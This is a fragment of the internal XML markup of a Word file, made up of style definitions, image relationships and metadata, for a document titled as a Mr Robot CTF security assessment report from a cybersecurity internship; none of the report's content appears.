      <w:color w:val="2E74B5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="P7">
    <w:name w:val="Heading 6"/>
    <w:qFormat/>
    <w:pPr>
      <w:outlineLvl w:val="5"/>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paragraph" w:styleId="P11">
    <w:name w:val="Endnote Text"/>
    <w:link w:val="C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Endnote Reference"/>
    <w:semiHidden/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="C6">
    <w:name w:val="Endnote Text Char"/>
    <w:link w:val="P1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jpg" /><Relationship Id="Relimage2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.jp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png" /><Relationship Id="Relimage10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" /><Relationship Id="RelHdr1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" /><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Bincom Dev Center | Cybersecurity Internship</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-10T04:23:24Z</dcterms:created>
  <cp:lastModifiedBy>Aman_Sharma</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-10T04:23:24Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject>TryHackMe training lab methodology and findings</dc:subject>
  <dc:title>Mr Robot CTF — Security Assessment Report</dc:title>
</cp:coreProperties>
</file>